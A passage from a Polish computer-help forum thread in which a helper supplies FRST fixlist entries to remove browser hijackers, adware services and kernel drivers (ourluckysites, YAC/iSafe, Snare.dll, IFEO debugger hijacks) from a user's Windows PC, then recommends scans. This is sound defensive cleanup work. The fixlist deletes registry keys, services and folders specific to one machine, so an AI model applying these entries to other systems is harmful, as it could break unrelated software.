    AppInit_DLLs-x32: C:\PROGRA~2\LENOVO~1\LENOVO~1\bin\SPVC32~1.DLL => C:\Program Files (x86)\LenovoBrowserGuard\LenovoBrowserGuard\bin\SPVC32Loader.dll [173896 2014-07-22] (ClientConnect LTD)
    IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
    IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...mp;uid=ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...mp;uid=ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D&q={searchTerms}
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D&q={searchTerms}
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...mp;uid=ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...mp;uid=ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D&q={searchTerms}
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D&q={searchTerms}
    HKU\S-1-5-21-3799993751-3803681585-1394063601-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=...mp;uid=ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D
    HKU\S-1-5-21-3799993751-3803681585-1394063601-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=...mp;uid=ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D
    HKU\S-1-5-21-3799993751-3803681585-1394063601-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://mystart.lenovo.com
    SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D&q={searchTerms}
    SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D&q={searchTerms}
    SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D&q={searchTerms}
    SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3799993751-3803681585-1394063601-1001 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3799993751-3803681585-1394063601-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?PC=WCUG&FORM=WCUGDF&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3799993751-3803681585-1394063601-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3799993751-3803681585-1394063601-1001 -> {B2BFD2DF-44F2-46F5-879F-FBBFCFF7AB06} URL =
    Edge HomeButtonPage: HKU\S-1-5-21-3799993751-3803681585-1394063601-1001 -> hxxp://www.ourluckysites.com/?type=hp&ts=...mp;uid=ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D
    FF DefaultProfile: rn39ugr3.default
    FF ProfilePath: C:\Users\Bernadeta\AppData\Roaming\Firefox\Firefox\Profiles\rn39ugr3.default [2017-05-15] <==== UWAGA
    FF Homepage: Firefox\Firefox\Profiles\rn39ugr3.default -> hxxp://www.searchinme.com/
    C:\Users\Bernadeta\AppData\Roaming\Firefox\Firefox\Profiles\rn39ugr3.default
    CHR HomePage: Default -> hxxp://www.msn.com/?pc=__PARAM__&ocid=__PARAM__DHP&osmkt=pl-pl
    CHR StartupUrls: Default -> "hxxp://www.ourluckysites.com/?
    CHR DefaultSearchURL: Default -> hxxp://www.ourluckysites.com/search/?type=ds&...ST500LT012-1DG142_S3PLGR2DXXXXS3PLGR2D&q={searchTerms}
    CHR DefaultSearchKeyword: Default -> ourluckysites
    CHR HKU\S-1-5-21-3799993751-3803681585-1394063601-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx
    HKU\S-1-5-21-3799993751-3803681585-1394063601-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Hotben\Application\chrome.exe (Google Inc.) <==== UWAGA
    R2 3DM; C:\Users\Bernadeta\AppData\Local\3DM\Kitty.dll [754688 2017-04-18] (kitty.exe) [Brak podpisu cyfrowego] <==== UWAGA
    C:\Users\Bernadeta\AppData\Local\3DM\
    R2 BIT; C:\ProgramData\BIT\BIT.dll [1812992 2017-05-31] (TODO: <公司名>) [Brak podpisu cyfrowego] <==== UWAGA
    C:\ProgramData\BIT\
    S2 ByteFenceService; C:\Program Files\ByteFence\ByteFenceService.exe [145888 2017-07-20] (Byte Technologies LLC)
    C:\Users\Bernadeta\AppData\Local\CSHMDR\
    S2 CSHMDR; C:\Users\Bernadeta\AppData\Local\CSHMDR\Snare.dll [900096 2017-05-22] (IntertSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA
    S2 CWASRE; C:\Users\Bernadeta\AppData\Local\CWASRE\Snare.dll [828416 2017-05-17] (IntertSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA
    R2 iSafeService; C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe [131024 2016-12-02] (Elex do Brasil Participações Ltda) <==== UWAGA
    U2 Kitty; C:\Users\Bernadeta\AppData\Local\Kitty\Kitty.dll [754688 2017-04-17] (kitty.exe) [Brak podpisu cyfrowego] <==== UWAGA
    R2 rtop; C:\Program Files\ByteFence\rtop\bin\rtop_svc.exe [302920 2017-08-29] ()
    C:\Users\Bernadeta\AppData\Local\SNARE\
    C:\Program Files\ByteFence\
    C:\Users\Bernadeta\AppData\Local\CWASRE\
    C:\Users\Bernadeta\AppData\Local\Kitty\
    R2 SNARE; C:\Users\Bernadeta\AppData\Local\SNARE\Snare.dll [826368 2017-05-02] (InterSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA
    R2 SSSvc; C:\Program Files (x86)\ScreenShot\SSSvc.exe [139744 2016-11-02] (Filseclab Corporation Limited)
    S2 terana; C:\Users\Bernadeta\AppData\Local\terana\terana.dll [909312 2017-05-31] (IntertSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA
    C:\Users\Bernadeta\AppData\Local\terana\
    R2 WindowsAppVerifierSvr; C:\ProgramData\Windows\App\Kit\ApplicationVerifier.dll [107008 2017-04-18] () [Brak podpisu cyfrowego]
    R2 WinSAPSvc; C:\Users\Bernadeta\AppData\Roaming\WinSAPSvc\WinSAP.dll [1886720 2017-05-31] () [Brak podpisu cyfrowego] <==== UWAGA
    C:\Users\Bernadeta\AppData\Roaming\WinSAPSvc\
    S2 FirefoxU; "C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe" [X] <==== UWAGA
    R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
    S3 iSafeKrnlBoot; C:\WINDOWS\System32\DRIVERS\iSafeKrnlBoot.sys [55056 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
    S1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
    R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
    R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-23] (Elex do Brasil Participações Ltda) <==== UWAGA
    R1 iSafeNetFilter; C:\WINDOWS\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) <==== UWAGA
    2017-11-23 16:53 - 2017-11-23 16:53 - 000004000 _____ C:\WINDOWS\System32\Tasks\Opera scheduled Autoupdate 1442219178
    2017-11-23 16:42 - 2017-02-26 11:06 - 000000000 ____D C:\Program Files\ByteFence
    2017-11-23 16:30 - 2017-05-31 16:26 - 000000000 ____D C:\Users\Bernadeta\AppData\Local\background_fault
    2017-11-23 16:28 - 2017-04-18 15:34 - 000000850 _____ C:\Users\Public\Documents\temp.dat
    C:\Program Files (x86)\Elex-tech\
    EmptyTemp:

    Po wykonaniu zrob pelny skan przy pomocy Mbam i usun to co wykryje:
    http://www.bleepingcomputer.com/download/malwarebytes-anti-malware/
    oraz http://ftp.drweb.com/pub/drweb/cureit/launch.exe

    Na koniec zamiesc nowe logi z FRST, ze skanowania.

    0
  • #5 23 Lis 2017 18:23
    szymon189
    Poziom 24  

    Kolobos napisał:
    Amazon 1Button App
    Kolobos napisał:

    YAC(Yet Another Cleaner!)
    Nie mogę usunąć. Mam wykonać dalsze czynności?

    0
  • #6 23 Lis 2017 18:25
    Kolobos
    Spec od komputerów

    Tak, pomin i wykonaj reszte.

    0
  • Pomocny post
    #8 23 Lis 2017 20:58
    Kolobos
    Spec od komputerów

    Nowy Fixlist.txt dla FRST:
    CHR Extension: (McAfee® WebAdvisor) - C:\Users\Bernadeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2017-03-21]
    C:\Users\Bernadeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho
    S2 mfemms; "C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe" [X]
    S3 cfwids; C:\WINDOWS\System32\drivers\cfwids.sys [80760 2015-09-23] (McAfee, Inc.)
    S3 mfeaack; C:\WINDOWS\System32\drivers\mfeaack.sys [415976 2015-09-23] (McAfee, Inc.)
    2017-11-23 20:31 - 2017-11-23 20:31 - 000000000 ____D C:\Users\Bernadeta\Downloads\FRST-OlderVersion
    2017-11-23 19:21 - 2017-11-23 19:21 - 007649280 _____ C:\Program Files (x86)\GUTCD8C.tmp
    2017-11-23 19:21 - 2017-11-23 19:21 - 000000000 ____D C:\Program Files (x86)\GUMCD7C.tmp
    2017-11-23 18:29 - 2017-11-23 18:49 - 000000000 ____D C:\AdwCleaner
    2017-11-23 19:04 - 2015-09-16 05:34 - 000000000 ____D C:\WINDOWS\System32\Tasks\McAfee
    2017-11-23 18:46 - 2015-01-06 07:15 - 000000000 ____D C:\Program Files (x86)\Amazon
    2017-11-23 17:43 - 2017-09-20 10:22 - 000000000 ____D C:\Program Files\rempl

    Po wykonaniu usun katalog C:\FRST i to wszystko.

    0
  • #9 04 Gru 2017 11:16
    szymon189
    Poziom 24  

    Dzięki za pomoc.

    0